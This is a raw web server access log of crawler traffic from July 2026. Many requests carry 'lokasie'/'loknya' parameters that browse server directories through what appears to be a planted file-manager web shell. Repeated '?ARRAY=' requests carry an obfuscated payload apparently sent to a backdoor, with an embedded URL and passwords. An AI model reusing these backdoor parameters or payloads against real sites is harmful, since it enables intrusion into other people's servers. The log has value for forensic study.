216.73.216.117 - - [21/Jul/2026:12:21:32 +0000] "GET /sitemap-11.xml?loknya=%2Fhome%2Fvmxfzbqj%2F.sitepad HTTP/2" 404 1921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.37.118.94 - - [21/Jul/2026:12:21:34 +0000] "GET /items/B395683477/ HTTP/2" 404 3174 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:21:35 +0000] "GET /sitemap.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 404 2332 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:38 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-script-modules.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:41 +0000] "GET /sitemap-12.xml?loknya=%2Fhome%2Fvmxfzbqj%2F.sitepad HTTP/2" 404 1921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:44 +0000] "GET /sitemap-7.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fai-client HTTP/2" 404 2181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.207 - - [21/Jul/2026:12:21:46 +0000] "GET /items/B395672333/ HTTP/2" 404 3100 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:21:47 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-encoding.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:50 +0000] "GET /sitemap-17.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2FID3 HTTP/2" 404 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:53 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-processor.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 19283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:56 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-oembed-controller.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:59 +0000] "GET /sitemap-7.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcertificates HTTP/2" 404 2130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
92.222.104.212 - - [21/Jul/2026:12:22:00 +0000] "GET /items/B395671219/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:22:02 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass.wp-scripts.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:20:02 +0000] "GET /?ARRAY=7o2230223n313738343634303030322p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363430322q3261613666363732643461626465326530363861396163663733613163316462222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:12:22:05 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-text-diff-renderer-table.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:08 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-script-modules.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:11 +0000] "GET /sitemap-7.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fsodium_compat HTTP/2" 404 2341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:14 +0000] "GET /sitemap-7.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fbuild HTTP/2" 404 2249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:22:15 +0000] "GET /detail/5823682790 HTTP/1.1" 200 30711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:22:17 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-script-modules.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:20 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-script-modules.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:07 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.221 - - [21/Jul/2026:12:20:28 +0000] "GET /items/B395957878/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:21:01 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmedia-upload.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:04 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fnav-menus.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 13740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:07 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fthemes.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 11229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:19:18 +0000] "GET /?ARRAY=7o2230223n313738343633393935382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363335382q3338323363383439303134363736383461303465346265636134333730316230222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
192.250.235.158 - - [21/Jul/2026:12:19:40 +0000] "GET /?ARRAY=7o2230223n313738343633393938302p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363338302q3964356338333533356463386365336137666661653938383230303636383638222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
92.222.104.206 - - [21/Jul/2026:12:22:09 +0000] "GET /items/B395663466/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.23.188.209 - - [21/Jul/2026:12:22:17 +0000] "GET /items/B395551832/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.49 - - [21/Jul/2026:12:22:20 +0000] "GET /items/B395171522/ HTTP/2" 404 44819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.241.56 - - [21/Jul/2026:12:22:21 +0000] "GET /index.php?lokasie=/sbin/nsec3hash&loknya=/sbin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/sbin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.117 - - [21/Jul/2026:12:22:23 +0000] "GET /sitemap-1.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmaint HTTP/2" 404 2128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:26 +0000] "GET /sitemap-13.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2FID3 HTTP/2" 404 2634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:29 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ffunctions.wp-scripts.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6938 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:36 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fedit-form-advanced.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 10992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:38 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fupdate.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 4448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:41 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fsession.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:44 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fload.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 17698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:47 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ffeed-atom.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:50 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fformatting.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 66765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.75.236.136 - - [21/Jul/2026:12:22:51 +0000] "GET /items/B395503933/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:22:53 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-streams.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:22:56 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-nav-menu.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4400 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.37.118.83 - - [21/Jul/2026:12:22:58 +0000] "GET /items/B395494662/ HTTP/2" 404 3174 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:22:59 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-rewrite.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 17291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:02 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-styles.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5487 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:05 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fsite-editor.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 5290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:23:07 +0000] "GET /cate-280-293 HTTP/1.1" 200 30327 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:23:08 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 34594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:11 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-dependencies.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:14 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Frss-functions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
176.31.139.11 - - [21/Jul/2026:12:23:17 +0000] "GET /items/B395439137/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:23:17 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-http-streams.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6534 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:21 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftemplate-canvas.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:23 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcron.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 10419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
5.39.1.226 - - [21/Jul/2026:12:23:25 +0000] "GET /items/B395403670/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.44 - - [21/Jul/2026:12:23:27 +0000] "GET /items/B394099921/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.117 - - [21/Jul/2026:12:23:26 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fai-client.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:20:25 +0000] "GET /?ARRAY=7o2230223n313738343634303032352p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363432352q3930373563343033343766653136666364663531343930663133333732383063222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
176.31.139.20 - - [21/Jul/2026:12:22:31 +0000] "GET /items/B395543164/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
5.39.1.226 - - [21/Jul/2026:12:22:41 +0000] "GET /items/B395538029/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:12:20:47 +0000] "GET /?ARRAY=7o2230223n313738343634303034372p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363434372q6166396462333931343630316133393434363538626431346633623761643164222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:12:23:00 +0000] "GET /detail/5958098585 HTTP/1.1" 200 31492 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.188.218 - - [21/Jul/2026:12:23:07 +0000] "GET /items/B395466636/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:12:21:09 +0000] "GET /?ARRAY=7o2230223n313738343634303036392p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363436392q3837623862656532653936373430333132626639333630633161306236346130222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
74.7.241.56 - - [21/Jul/2026:12:23:25 +0000] "GET /index.php?lokasie=/bin/ranlib&loknya=/bin HTTP/2" 404 22377 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
5.39.1.254 - - [21/Jul/2026:12:23:37 +0000] "GET /items/B395379212/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:23:53 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-delete-site.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:21:53 +0000] "GET /?ARRAY=7o2230223n313738343634303131332p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363531332q3063396233383737303865643861626635346462393231653164313363353136222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:12:23:56 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fbookmark-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 5017 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:23:59 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Frewrite.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:24:02 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ftheme-templates.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.23.188.194 - - [21/Jul/2026:12:24:03 +0000] "GET /items/B395326665/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:24:05 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-options.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
